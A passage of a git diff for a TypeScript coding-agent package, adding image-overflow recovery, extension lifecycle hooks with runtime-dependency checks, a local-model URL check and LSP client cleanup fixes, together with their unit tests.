image", () => { + const messages: Message[] = []; + for (let i = 0; i < 10; i++) { + messages.push( + makeUserMsg([ + { type: "image", data: `img${i}`, mimeType: "image/jpeg" }, + ]), + ); + messages.push(makeAssistantMsg(`reply ${i}`)); + } + + downsizeConversationImages(messages); + + // First message's image should have been replaced with text + const firstMsg = messages[0]; + 
const arr = firstMsg.content as any[]; + const placeholder = arr.find( + (c: any) => c.type === "text" && c.text.includes("[image removed"), + ); + assert.ok(placeholder, "Stripped image should be replaced with text placeholder"); + assert.ok( + placeholder.text.includes("image/jpeg"), + "Placeholder should mention original mime type", + ); + }); + + it("handles toolResult messages with images", () => { + const messages: Message[] = []; + for (let i = 0; i < 10; i++) { + messages.push(makeToolResultMsg(1)); + messages.push(makeAssistantMsg(`reply ${i}`)); + } + + const result = downsizeConversationImages(messages); + assert.equal(result.imageCount, 10); + assert.equal(result.strippedCount, 5); + assert.ok(result.processed); + }); + + it("handles mixed user and toolResult images", () => { + const messages: Message[] = []; + for (let i = 0; i < 8; i++) { + messages.push( + makeUserMsg([ + { type: "text", text: `check ${i}` }, + { type: "image", data: `uimg${i}`, mimeType: "image/png" }, + ]), + ); + messages.push(makeAssistantMsg(`processing ${i}`)); + messages.push(makeToolResultMsg(1)); + messages.push(makeAssistantMsg(`done ${i}`)); + } + + const result = downsizeConversationImages(messages); + // 8 user images + 8 tool result images = 16 total + assert.equal(result.imageCount, 16); + assert.equal(result.strippedCount, 11); // 16 - 5 recent + }); +}); diff --git a/packages/pi-coding-agent/src/core/image-overflow-recovery.ts b/packages/pi-coding-agent/src/core/image-overflow-recovery.ts new file mode 100644 index 000000000..3573514e4 --- /dev/null +++ b/packages/pi-coding-agent/src/core/image-overflow-recovery.ts @@ -0,0 +1,118 @@ +/** + * Image overflow recovery for many-image sessions. + * + * When a conversation accumulates many images (screenshots, file reads, etc.), + * the Anthropic API enforces a stricter per-image dimension limit (2000px) for + * "many-image requests." 
This module detects the resulting 400 error and + * recovers by stripping older images from the conversation history, preserving + * the most recent ones to maintain session continuity. + * + * @see https://github.com/gsd-build/gsd-2/issues/2874 + */ + +import type { Message, ImageContent, TextContent } from "@gsd/pi-ai"; + +/** + * Maximum image dimension (px) that the Anthropic API allows in many-image + * requests. Images at or above this size in a large conversation will be + * rejected with a 400 error. We use 1568 as the safe ceiling (Anthropic's + * recommended max for multi-image requests). + */ +export const MANY_IMAGE_MAX_DIMENSION = 1568; + +/** + * Number of recent images to preserve when stripping old images. + * Keeps the most recent screenshots/images so the model retains visual context + * for the current task. + */ +const RECENT_IMAGES_TO_KEEP = 5; + +/** + * Regex matching the Anthropic API error for oversized images in many-image requests. + */ +const IMAGE_DIMENSION_ERROR_RE = + /image.dimensions?.exceed.*max.*allowed.*size.*many.image/i; + +/** + * Detect whether an error message is the Anthropic "image dimensions exceed max + * allowed size for many-image requests" 400 error. + */ +export function isImageDimensionError(errorMessage: string | undefined | null): boolean { + if (!errorMessage) return false; + return IMAGE_DIMENSION_ERROR_RE.test(errorMessage); +} + +export interface DownsizeResult { + /** Total number of images found in the conversation */ + imageCount: number; + /** Whether any images were stripped */ + processed: boolean; + /** Number of images that were stripped */ + strippedCount: number; +} + +/** + * Strip older images from conversation messages to recover from many-image + * dimension errors. Preserves the N most recent images and replaces older ones + * with a text placeholder. + * + * Mutates messages in place (same pattern as replaceMessages/compaction). 
+ * + * Accepts Message[] (the LLM message union) so it works with both + * agent.state.messages and session entries. + */ +export function downsizeConversationImages(messages: Message[]): DownsizeResult { + // First pass: collect all image locations (message index + content index) + const imageLocations: Array<{ msgIdx: number; contentIdx: number }> = []; + + for (let msgIdx = 0; msgIdx < messages.length; msgIdx++) { + const msg = messages[msgIdx]; + if (msg.role === "assistant") continue; + + // UserMessage can have string content; ToolResultMessage always has array + if (msg.role === "user" && typeof msg.content === "string") continue; + + const contentArr = msg.content as (TextContent | ImageContent)[]; + if (!Array.isArray(contentArr)) continue; + + for (let contentIdx = 0; contentIdx < contentArr.length; contentIdx++) { + if (contentArr[contentIdx].type === "image") { + imageLocations.push({ msgIdx, contentIdx }); + } + } + } + + const imageCount = imageLocations.length; + if (imageCount === 0) { + return { imageCount: 0, processed: false, strippedCount: 0 }; + } + + // Determine which images to strip (all except the N most recent) + const stripCount = Math.max(0, imageCount - RECENT_IMAGES_TO_KEEP); + if (stripCount === 0) { + return { imageCount, processed: false, strippedCount: 0 }; + } + + const toStrip = imageLocations.slice(0, stripCount); + + // Second pass: replace stripped images with text placeholder. + // Process in reverse order to maintain content indices. 
+ for (let i = toStrip.length - 1; i >= 0; i--) { + const { msgIdx, contentIdx } = toStrip[i]; + const msg = messages[msgIdx]; + if (msg.role === "assistant") continue; + if (msg.role === "user" && typeof msg.content === "string") continue; + + const contentArr = msg.content as (TextContent | ImageContent)[]; + const imageBlock = contentArr[contentIdx] as ImageContent; + const mimeType = imageBlock.mimeType || "image/unknown"; + + // Replace the image block with a text placeholder + (contentArr as any[])[contentIdx] = { + type: "text", + text: `[image removed to reduce context size — was ${mimeType}]`, + } as TextContent; + } + + return { imageCount, processed: true, strippedCount: stripCount }; +} diff --git a/packages/pi-coding-agent/src/core/index.ts b/packages/pi-coding-agent/src/core/index.ts index 10c6f1753..5dd346548 100644 --- a/packages/pi-coding-agent/src/core/index.ts +++ b/packages/pi-coding-agent/src/core/index.ts @@ -29,6 +29,7 @@ export { type ExecResult, type Extension, type ExtensionAPI, + type ExtensionManifest, type ExtensionCommandContext, type ExtensionContext, type ExtensionError, @@ -53,6 +54,11 @@ export { type SessionSwitchEvent, type SessionTreeEvent, type ToolCallEvent, + readManifest, + readManifestFromEntryPath, + type SortResult, + type SortWarning, + sortExtensionPaths, type ToolDefinition, type ToolRenderResultOptions, type ToolResultEvent, diff --git a/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts b/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts new file mode 100644 index 000000000..d19c87d16 --- /dev/null +++ b/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts @@ -0,0 +1,227 @@ +import assert from "node:assert/strict"; +import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync } from "node:fs"; +import { homedir, tmpdir } from "node:os"; +import { join, resolve } from "node:path"; +import { describe, it } from "node:test"; +import { + readManifestRuntimeDeps, + collectRuntimeDependencies, + 
verifyRuntimeDependencies, + resolveLocalSourcePath, +} from "./lifecycle-hooks.js"; + +function tmpDir(prefix: string, t: { after: (fn: () => void) => void }): string { + const dir = mkdtempSync(join(tmpdir(), `pi-lh-${prefix}-`)); + t.after(() => rmSync(dir, { recursive: true, force: true })); + return dir; +} + +// ─── readManifestRuntimeDeps ────────────────────────────────────────────────── + +describe("readManifestRuntimeDeps", () => { + it("returns empty array when manifest file is missing", (t) => { + const dir = tmpDir("no-manifest", t); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); + + it("returns empty array for malformed JSON", (t) => { + const dir = tmpDir("bad-json", t); + writeFileSync(join(dir, "extension-manifest.json"), "not json{{{", "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); + + it("returns runtime deps from valid manifest", (t) => { + const dir = tmpDir("valid", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["claude", "node"] }, + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), ["claude", "node"]); + }); + + it("returns empty array when dependencies exists but runtime is missing", (t) => { + const dir = tmpDir("no-runtime", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: {}, + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); + + it("returns empty array when runtime is empty", (t) => { + const dir = tmpDir("empty-runtime", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: [] }, + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); + + it("filters out non-string entries in runtime array", (t) => { + const dir = tmpDir("mixed-types", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: [123, null, "node", false, "python"] }, + }), "utf-8"); + 
assert.deepEqual(readManifestRuntimeDeps(dir), ["node", "python"]); + }); + + it("returns empty array when no dependencies field at all", (t) => { + const dir = tmpDir("no-deps-field", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + id: "test", + name: "Test", + }), "utf-8"); + assert.deepEqual(readManifestRuntimeDeps(dir), []); + }); +}); + +// ─── collectRuntimeDependencies ─────────────────────────────────────────────── + +describe("collectRuntimeDependencies", () => { + it("aggregates deps from installedPath manifest", (t) => { + const dir = tmpDir("collect-installed", t); + writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["claude"] }, + }), "utf-8"); + assert.deepEqual(collectRuntimeDependencies(dir, []), ["claude"]); + }); + + it("aggregates deps from entry path directory manifests", (t) => { + const root = tmpDir("collect-entry", t); + const installedDir = join(root, "installed"); + const entryDir = join(root, "entry"); + mkdirSync(installedDir, { recursive: true }); + mkdirSync(entryDir, { recursive: true }); + writeFileSync(join(entryDir, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["python"] }, + }), "utf-8"); + const deps = collectRuntimeDependencies(installedDir, [join(entryDir, "index.ts")]); + assert.deepEqual(deps, ["python"]); + }); + + it("deduplicates across multiple directories", (t) => { + const root = tmpDir("collect-dedup", t); + const dir1 = join(root, "dir1"); + const dir2 = join(root, "dir2"); + mkdirSync(dir1, { recursive: true }); + mkdirSync(dir2, { recursive: true }); + writeFileSync(join(dir1, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["node", "python"] }, + }), "utf-8"); + writeFileSync(join(dir2, "extension-manifest.json"), JSON.stringify({ + dependencies: { runtime: ["python", "claude"] }, + }), "utf-8"); + const deps = collectRuntimeDependencies(dir1, [join(dir2, "index.ts")]); + 
assert.equal(deps.length, 3); + assert.ok(deps.includes("node")); + assert.ok(deps.includes("python")); + assert.ok(deps.includes("claude")); + }); + + it("returns empty when no directories have manifests", (t) => { + const dir = tmpDir("collect-empty", t); + assert.deepEqual(collectRuntimeDependencies(dir, []), []); + }); +}); + +// ─── verifyRuntimeDependencies ──────────────────────────────────────────────── + +describe("verifyRuntimeDependencies", () => { + it("does not throw for empty deps array", () => { + assert.doesNotThrow(() => verifyRuntimeDependencies([], "test-source", "pi")); + }); + + it("does not throw when all deps are present", () => { + assert.doesNotThrow(() => verifyRuntimeDependencies(["node"], "test-source", "pi")); + }); + + it("throws for missing dep with 'Missing runtime dependencies' message", () => { + assert.throws( + () => verifyRuntimeDependencies(["__nonexistent_dep_for_test__"], "test-source", "pi"), + (err: Error) => { + assert.ok(err.message.includes("Missing runtime dependencies")); + assert.ok(err.message.includes("__nonexistent_dep_for_test__")); + return true; + }, + ); + }); + + it("lists all missing deps in error message", () => { + assert.throws( + () => verifyRuntimeDependencies(["__missing_1__", "__missing_2__"], "test-source", "pi"), + (err: Error) => { + assert.ok(err.message.includes("__missing_1__")); + assert.ok(err.message.includes("__missing_2__")); + return true; + }, + ); + }); + + it("includes appName and source in error for retry hint", () => { + assert.throws( + () => verifyRuntimeDependencies(["__missing__"], "github:user/repo", "gsd"), + (err: Error) => { + assert.ok(err.message.includes("gsd")); + assert.ok(err.message.includes("github:user/repo")); + return true; + }, + ); + }); +}); + +// ─── resolveLocalSourcePath ─────────────────────────────────────────────────── + +describe("resolveLocalSourcePath", () => { + it("returns undefined for empty string", () => { + assert.equal(resolveLocalSourcePath("", 
"/tmp"), undefined); + }); + + it("returns undefined for npm: source", () => { + assert.equal(resolveLocalSourcePath("npm:@foo/bar", "/tmp"), undefined); + }); + + it("returns undefined for git URL", () => { + assert.equal(resolveLocalSourcePath("git:github.com/user/repo", "/tmp"), undefined); + }); + + it("returns undefined for https git URL", () => { + assert.equal(resolveLocalSourcePath("https://github.com/user/repo", "/tmp"), undefined); + }); + + it("resolves ~ to homedir", () => { + const result = resolveLocalSourcePath("~", "/tmp"); + if (existsSync(homedir())) { + assert.equal(result, homedir()); + } else { + assert.equal(result, undefined); + } + }); + + it("resolves ~/path relative to homedir", () => { + const result = resolveLocalSourcePath("~/", "/tmp"); + if (existsSync(homedir())) { + assert.equal(result, homedir()); + } else { + assert.equal(result, undefined); + } + }); + + it("resolves relative path that exists", (t) => { + const dir = tmpDir("resolve-rel", t); + const sub = join(dir, "myext"); + mkdirSync(sub, { recursive: true }); + const result = resolveLocalSourcePath("myext", dir); + assert.equal(result, resolve(dir, "myext")); + }); + + it("returns undefined for relative path that does not exist", (t) => { + const dir = tmpDir("resolve-noexist", t); + assert.equal(resolveLocalSourcePath("nonexistent", dir), undefined); + }); + + it("resolves absolute path that exists", (t) => { + const dir = tmpDir("resolve-abs", t); + assert.equal(resolveLocalSourcePath(dir, "/irrelevant"), dir); + }); + + it("returns undefined for absolute path that does not exist", () => { + assert.equal(resolveLocalSourcePath("/tmp/__nonexistent_path_for_test__", "/tmp"), undefined); + }); +}); diff --git a/packages/pi-coding-agent/src/core/lifecycle-hooks.ts b/packages/pi-coding-agent/src/core/lifecycle-hooks.ts new file mode 100644 index 000000000..fa103ef79 --- /dev/null +++ b/packages/pi-coding-agent/src/core/lifecycle-hooks.ts @@ -0,0 +1,280 @@ +import { spawnSync } 
from "node:child_process"; +import { existsSync, readFileSync } from "node:fs"; +import { homedir } from "node:os"; +import { dirname, join, resolve } from "node:path"; +import { pathToFileURL } from "node:url"; +import { parseGitUrl } from "../utils/git.js"; +import { + importExtensionModule, + loadExtensions, + type LifecycleHookContext, + type LifecycleHookMap, + type LifecycleHookHandler, + type LifecycleHookPhase, + type LifecycleHookScope, +} from "./extensions/index.js"; +import type { DefaultPackageManager } from "./package-manager.js"; + +interface ExtensionManifest { + dependencies?: { + runtime?: string[]; + }; +} + +export interface PackageLifecycleHooksOptions { + source: string; + local: boolean; + cwd: string; + agentDir: string; + appName: string; + packageManager: DefaultPackageManager; + stdout: NodeJS.WriteStream; + stderr: NodeJS.WriteStream; +} + +export type LifecycleHooksTarget = "source" | "installed"; + +export interface PrepareLifecycleHooksOptions { + verifyRuntimeDependencies?: boolean; +} + +export interface LifecycleHooksRunResult { + phase: LifecycleHookPhase; + hooksRun: number; + hookErrors: number; + legacyHooksRun: number; + entryPathCount: number; + skipped: boolean; +} + +interface LoadedLifecycleHooks { + source: string; + scope: LifecycleHookScope; + installedPath?: string; + cwd: string; + stdout: NodeJS.WriteStream; + stderr: NodeJS.WriteStream; + entryPaths: string[]; + hooksByPath: Map; +} + +function toScope(local: boolean): LifecycleHookScope { + return local ? "project" : "user"; +} + +export function readManifestRuntimeDeps(dir: string): string[] { + const manifestPath = join(dir, "extension-manifest.json"); + if (!existsSync(manifestPath)) return []; + try { + const manifest = JSON.parse(readFileSync(manifestPath, "utf-8")) as ExtensionManifest; + return manifest.dependencies?.runtime?.filter((dep): dep is string => typeof dep === "string") ?? 
[]; + } catch { + return []; + } +} + +export function collectRuntimeDependencies(installedPath: string, entryPaths: string[]): string[] { + const deps = new Set(); + const candidateDirs = new Set([installedPath, ...entryPaths.map((entryPath) => dirname(entryPath))]); + for (const dir of candidateDirs) { + for (const dep of readManifestRuntimeDeps(dir)) { + deps.add(dep); + } + } + return Array.from(deps); +} + +export function verifyRuntimeDependencies(runtimeDeps: string[], source: string, appName: string): void { + const missing: string[] = []; + for (const dep of runtimeDeps) { + const result = spawnSync(dep, ["--version"], { encoding: "utf-8", timeout: 5000 }); + if (result.error || result.status !== 0) { + missing.push(dep); + } + } + if (missing.length === 0) return; + throw new Error( + `Missing runtime dependencies: ${missing.join(", ")}.\n` + + `Install them and retry: ${appName} install ${source}`, + ); +} + +export function resolveLocalSourcePath(source: string, cwd: string): string | undefined { + const trimmed = source.trim(); + if (!trimmed) return undefined; + if (trimmed.startsWith("npm:")) return undefined; + if (parseGitUrl(trimmed)) return undefined; + + let normalized = trimmed; + if (normalized === "~") { + normalized = homedir(); + } else if (normalized.startsWith("~/")) { + normalized = join(homedir(), normalized.slice(2)); + } + + const absolutePath = resolve(cwd, normalized); + return existsSync(absolutePath) ? 
absolutePath : undefined; +} + +async function resolveEntryPathsFromTarget( + options: PackageLifecycleHooksOptions, + target: LifecycleHooksTarget, + scope: LifecycleHookScope, +): Promise<{ entryPaths: string[]; installedPath?: string }> { + if (target === "source") { + const localSourcePath = resolveLocalSourcePath(options.source, options.cwd); + if (!localSourcePath) return { entryPaths: [] }; + const resolved = await options.packageManager.resolveExtensionSources([localSourcePath], { local: true }); + const entryPaths = resolved.extensions.filter((resource) => resource.enabled).map((resource) => resource.path); + return { entryPaths, installedPath: localSourcePath }; + } + + const installedPath = options.packageManager.getInstalledPath(options.source, scope); + if (!installedPath) return { entryPaths: [] }; + const resolved = await options.packageManager.resolveExtensionSources([installedPath], { local: true }); + const entryPaths = resolved.extensions.filter((resource) => resource.enabled).map((resource) => resource.path); + return { entryPaths, installedPath }; +} + +export async function prepareLifecycleHooks( + options: PackageLifecycleHooksOptions, + target: LifecycleHooksTarget, + prepareOptions?: PrepareLifecycleHooksOptions, +): Promise { + const scope = toScope(options.local); + const { entryPaths, installedPath } = await resolveEntryPathsFromTarget(options, target, scope); + if (entryPaths.length === 0) { + return null; + } + + if (prepareOptions?.verifyRuntimeDependencies && installedPath) { + const runtimeDeps = collectRuntimeDependencies(installedPath, entryPaths); + verifyRuntimeDependencies(runtimeDeps, options.source, options.appName); + } + + const loaded = await loadExtensions(entryPaths, options.cwd); + for (const { path, error } of loaded.errors) { + options.stderr.write(`[lifecycle-hooks] Failed to load extension "${path}": ${error}\n`); + } + + const hooksByPath = new Map(); + for (const extension of loaded.extensions) { + 
hooksByPath.set(extension.path, extension.lifecycleHooks); + } + + return { + source: options.source, + scope, + installedPath, + cwd: options.cwd, + stdout: options.stdout, + stderr: options.stderr, + entryPaths, + hooksByPath, + }; +} + +async function runHookSafe( + hook: LifecycleHookHandler, + context: LifecycleHookContext, + stderr: NodeJS.WriteStream, +): Promise { + try { + await hook(context); + return true; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + stderr.write(`[lifecycle-hooks:${context.phase}] Hook failed: ${message}\n`); + return false; + } +} + +function getLegacyExportCandidates(phase: LifecycleHookPhase): string[] { + return [phase]; +} + +const _legacyModuleCache = new Map>(); + +async function runLegacyExportHook( + entryPath: string, + phase: LifecycleHookPhase, + context: LifecycleHookContext, +): Promise { + try { + let module = _legacyModuleCache.get(entryPath); + if (!module) { + module = await importExtensionModule>(import.meta.url, pathToFileURL(entryPath).href); + _legacyModuleCache.set(entryPath, module); + } + for (const exportName of getLegacyExportCandidates(phase)) { + const candidate = module[exportName]; + if (typeof candidate === "function") { + return candidate as LifecycleHookHandler; + } + } + return null; + } catch { + return null; + } +} + +export async function runLifecycleHooks( + loaded: LoadedLifecycleHooks | null, + phase: LifecycleHookPhase, +): Promise { + if (!loaded) { + return { + phase, + hooksRun: 0, + hookErrors: 0, + legacyHooksRun: 0, + entryPathCount: 0, + skipped: true, + }; + } + + const context: LifecycleHookContext = { + phase, + source: loaded.source, + installedPath: loaded.installedPath, + scope: loaded.scope, + cwd: loaded.cwd, + interactive: Boolean(process.stdin.isTTY && process.stdout.isTTY), + log: (message) => loaded.stdout.write(`${message}\n`), + warn: (message) => loaded.stderr.write(`${message}\n`), + error: (message) => 
loaded.stderr.write(`${message}\n`), + }; + + let hooksRun = 0; + let hookErrors = 0; + let legacyHooksRun = 0; + + for (const entryPath of loaded.entryPaths) { + const hookMap = loaded.hooksByPath.get(entryPath); + const registeredHooks = hookMap?.[phase] ?? []; + if (registeredHooks.length > 0) { + for (const hook of registeredHooks) { + hooksRun += 1; + const ok = await runHookSafe(hook, context, loaded.stderr); + if (!ok) hookErrors += 1; + } + continue; + } + + const legacyHook = await runLegacyExportHook(entryPath, phase, context); + if (!legacyHook) continue; + + legacyHooksRun += 1; + const ok = await runHookSafe(legacyHook, context, loaded.stderr); + if (!ok) hookErrors += 1; + } + + return { + phase, + hooksRun, + hookErrors, + legacyHooksRun, + entryPathCount: loaded.entryPaths.length, + skipped: false, + }; +} diff --git a/packages/pi-coding-agent/src/core/local-model-check.ts b/packages/pi-coding-agent/src/core/local-model-check.ts new file mode 100644 index 000000000..b468e459f --- /dev/null +++ b/packages/pi-coding-agent/src/core/local-model-check.ts @@ -0,0 +1,45 @@ +/** + * local-model-check.ts — Utility to detect if a model baseUrl is local. + * + * Leaf module with zero transitive dependencies on TypeScript parameter properties. + * Used by ModelRegistry and tests. + */ + +/** + * Check if a model's baseUrl points to a local endpoint. + * Returns true for localhost, 127.0.0.1, 0.0.0.0, ::1, or unix socket paths. + * Returns false if baseUrl is empty (cloud provider) or points to a remote host. 
+ */ +export function isLocalModel(model: { baseUrl: string }): boolean { + const url = model.baseUrl; + if (!url) return false; + + // Unix socket paths + if (url.startsWith("unix://") || url.startsWith("unix:")) return true; + + try { + const parsed = new URL(url); + const hostname = parsed.hostname; + if ( + hostname === "localhost" || + hostname === "127.0.0.1" || + hostname === "0.0.0.0" || + hostname === "::1" || + hostname === "[::1]" + ) { + return true; + } + } catch { + // If URL parsing fails, check raw string for local patterns + if ( + url.includes("localhost") || + url.includes("127.0.0.1") || + url.includes("0.0.0.0") || + url.includes("[::1]") + ) { + return true; + } + } + + return false; +} diff --git a/packages/pi-coding-agent/src/core/lsp/client.ts b/packages/pi-coding-agent/src/core/lsp/client.ts index 930dc8374..400b2beb0 100644 --- a/packages/pi-coding-agent/src/core/lsp/client.ts +++ b/packages/pi-coding-agent/src/core/lsp/client.ts @@ -24,11 +24,25 @@ const clients = new Map(); const clientLocks = new Map>(); const fileOperationLocks = new Map>(); +/** Track stream listeners per client so they can be removed on shutdown. */ +interface StreamHandlers { + stdoutData?: (chunk: Buffer) => void; + stdoutEnd?: () => void; + stdoutError?: () => void; + stderrData?: (chunk: Buffer) => void; + stderrEnd?: () => void; + stderrError?: () => void; +} +const clientStreamHandlers = new Map(); + // Idle timeout configuration (disabled by default) let idleTimeoutMs: number | null = null; let idleCheckInterval: ReturnType | null = null; const IDLE_CHECK_INTERVAL_MS = 60 * 1000; +/** Maximum allowed size for the message buffer (10 MB). */ +const MAX_MESSAGE_BUFFER_SIZE = 10 * 1024 * 1024; + /** * Configure the idle timeout for LSP clients. 
*/ @@ -52,6 +66,10 @@ function startIdleChecker(): void { shutdownClient(key); } } + // Stop the checker if there are no more clients to monitor + if (clients.size === 0) { + stopIdleChecker(); + } }, IDLE_CHECK_INTERVAL_MS); } @@ -250,8 +268,21 @@ async function startMessageReader(client: LspClient): Promise { } return new Promise((resolve) => { - stdout.on("data", async (chunk: Buffer) => { + const handlers = clientStreamHandlers.get(client.name) ?? {}; + + handlers.stdoutData = async (chunk: Buffer) => { const currentBuffer: Buffer = Buffer.concat([client.messageBuffer, chunk]); + + if (currentBuffer.length > MAX_MESSAGE_BUFFER_SIZE) { + if (process.env.DEBUG) { + console.error( + `[lsp] Message buffer exceeded ${MAX_MESSAGE_BUFFER_SIZE} bytes (${currentBuffer.length}), discarding`, + ); + } + client.messageBuffer = Buffer.alloc(0); + return; + } + client.messageBuffer = currentBuffer; let workingBuffer = currentBuffer; @@ -289,17 +320,22 @@ async function startMessageReader(client: LspClient): Promise { } client.messageBuffer = workingBuffer; - }); + }; + stdout.on("data", handlers.stdoutData); - stdout.on("end", () => { + handlers.stdoutEnd = () => { client.isReading = false; resolve(); - }); + }; + stdout.on("end", handlers.stdoutEnd); - stdout.on("error", () => { + handlers.stdoutError = () => { client.isReading = false; resolve(); - }); + }; + stdout.on("error", handlers.stdoutError); + + clientStreamHandlers.set(client.name, handlers); }); } @@ -384,21 +420,28 @@ async function startStderrReader(client: LspClient): Promise { if (!stderr) return; return new Promise((resolve) => { - stderr.on("data", (chunk: Buffer) => { + const handlers = clientStreamHandlers.get(client.name) ?? 
{}; + + handlers.stderrData = (chunk: Buffer) => { const text = chunk.toString("utf-8"); client.stderrBuffer += text; if (client.stderrBuffer.length > 4096) { client.stderrBuffer = client.stderrBuffer.slice(-4096); } - }); + }; + stderr.on("data", handlers.stderrData); - stderr.on("end", () => { + handlers.stderrEnd = () => { resolve(); - }); + }; + stderr.on("end", handlers.stderrEnd); - stderr.on("error", () => { + handlers.stderrError = () => { resolve(); - }); + }; + stderr.on("error", handlers.stderrError); + + clientStreamHandlers.set(client.name, handlers); }); } @@ -688,6 +731,23 @@ export function notifyFileChanged(filePath: string): void { } } +/** + * Remove stdout/stderr stream listeners for a client to prevent leaks. + */ +function removeStreamHandlers(client: LspClient): void { + const handlers = clientStreamHandlers.get(client.name); + if (!handlers) return; + + if (handlers.stdoutData) client.proc.stdout?.removeListener("data", handlers.stdoutData); + if (handlers.stdoutEnd) client.proc.stdout?.removeListener("end", handlers.stdoutEnd); + if (handlers.stdoutError) client.proc.stdout?.removeListener("error", handlers.stdoutError); + if (handlers.stderrData) client.proc.stderr?.removeListener("data", handlers.stderrData); + if (handlers.stderrEnd) client.proc.stderr?.removeListener("end", handlers.stderrEnd); + if (handlers.stderrError) client.proc.stderr?.removeListener("error", handlers.stderrError); + + clientStreamHandlers.delete(client.name); +} + /** * Shutdown a specific client by key. 
*/ @@ -702,12 +762,23 @@ function shutdownClient(key: string): void { sendRequest(client, "shutdown", null).catch(() => {}); + // Remove stream listeners before killing the process + removeStreamHandlers(client); + try { killProcessTree(client.proc.pid); } catch { client.proc.kill(); } clients.delete(key); + clientLocks.delete(key); + + // Clean up any file operation locks associated with this client + for (const lockKey of Array.from(fileOperationLocks.keys())) { + if (lockKey.startsWith(`${key}:`)) { + fileOperationLocks.delete(lockKey); + } + } } // ============================================================================= @@ -822,6 +893,9 @@ async function sendNotification(client: LspClient, method: string, params: unkno function shutdownAll(): void { const clientsToShutdown = Array.from(clients.values()); clients.clear(); + clientLocks.clear(); + fileOperationLocks.clear(); + stopIdleChecker(); const err = new Error("LSP client shutdown"); for (const client of clientsToShutdown) { @@ -831,6 +905,9 @@ function shutdownAll(): void { pending.reject(err); } + // Remove stream listeners before killing the process + removeStreamHandlers(client); + void (async () => { const timeout = new Promise(resolve => setTimeout(resolve, 5_000)); const result = sendRequest(client, "shutdown", null).catch(() => {}); @@ -864,14 +941,28 @@ export function getActiveClients(): LspServerStatus[] { // Process Cleanup // ============================================================================= +const _beforeExitHandler = () => shutdownAll(); +const _sigintHandler = () => { + shutdownAll(); + process.exit(0); +}; +const _sigtermHandler = () => { + shutdownAll(); + process.exit(0); +}; + if (typeof process !== "undefined") { - process.on("beforeExit", shutdownAll); - process.on("SIGINT", () => { - shutdownAll(); - process.exit(0); - }); - process.on("SIGTERM", () => { - shutdownAll(); - process.exit(0); - }); + process.on("beforeExit", _beforeExitHandler); + process.on("SIGINT", 
_sigintHandler); + process.on("SIGTERM", _sigtermHandler); +} + +/** + * Remove process-level signal handlers registered at module load. + * Call this during graceful teardown to prevent leaked listeners. + */ +export function removeProcessHandlers(): void { + process.off("beforeExit", _beforeExitHandler); + process.off("SIGINT", _sigintHandler); + process.off("SIGTERM", _sigtermHandler); } diff --git a/packages/pi-coding-agent/src/core/lsp/config.ts b/packages/pi-coding-agent/src/core/lsp/config.ts index cc104be21..758657856 100644 --- a/packages/pi-coding-agent/src/core/lsp/config.ts +++ b/packages/pi-coding-agent/src/core/lsp/config.ts @@ -12,6 +12,11 @@ import type { ServerConfig } from "./types.js"; const require = createRequire(import.meta.url); const DEFAULTS = require("./defaults.json") as Record>; +/** Map legacy server keys to their current names so user overrides still merge. */ +const LEGACY_ALIASES: Record = { + "kotlin-language-server": "kotlin-lsp", +}; + export interface LspConfig { servers: Record; /** Idle timeout in milliseconds. If set, LSP clients will be shutdown after this period of inactivity. Disabled by default. */ @@ -109,7 +114,8 @@ function mergeServers( overrides: Record>, ): Record { const merged: Record = { ...base }; - for (const [name, config] of Object.entries(overrides)) { + for (const [rawName, config] of Object.entries(overrides)) { + const name = LEGACY_ALIASES[rawName] ?? 
rawName; if (merged[name]) { const candidate = { ...merged[name], ...config }; const normalized = normalizeServerConfig(name, candidate); diff --git a/packages/pi-coding-agent/src/core/lsp/defaults.json b/packages/pi-coding-agent/src/core/lsp/defaults.json index dbea73b6c..6bc16ba82 100644 --- a/packages/pi-coding-agent/src/core/lsp/defaults.json +++ b/packages/pi-coding-agent/src/core/lsp/defaults.json @@ -189,8 +189,8 @@ "fileTypes": [".java"], "rootMarkers": ["pom.xml", "build.gradle", "build.gradle.kts", "settings.gradle", ".project"] }, - "kotlin-language-server": { - "command": "kotlin-language-server", + "kotlin-lsp": { + "command": "kotlin-lsp", "args": [], "fileTypes": [".kt", ".kts"], "rootMarkers": ["build.gradle", "build.gradle.kts", "pom.xml", "settings.gradle", "settings.gradle.kts"] diff --git a/packages/pi-coding-agent/src/core/lsp/index.ts b/packages/pi-coding-agent/src/core/lsp/index.ts index 61237e7eb..bd2718634 100644 --- a/packages/pi-coding-agent/src/core/lsp/index.ts +++ b/packages/pi-coding-agent/src/core/lsp/index.ts @@ -340,6 +340,9 @@ async function runWorkspaceDiagnostics( const proc = spawn(cmd, cmdArgs, { cwd, stdio: ["ignore", "pipe", "pipe"], + // On Windows, project-type commands (tsc, cargo, etc.) may be .cmd + // wrappers that need shell resolution to avoid ENOENT/EINVAL (#2854). + shell: process.platform === "win32", }); const abortHandler = () => { proc.kill(); diff --git a/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts b/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts new file mode 100644 index 000000000..c1d4d99ec --- /dev/null +++ b/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts @@ -0,0 +1,70 @@ +// GSD2 — Regression test for LSP legacy server key aliases +// Copyright (c) 2026 Jeremy McSpadden + 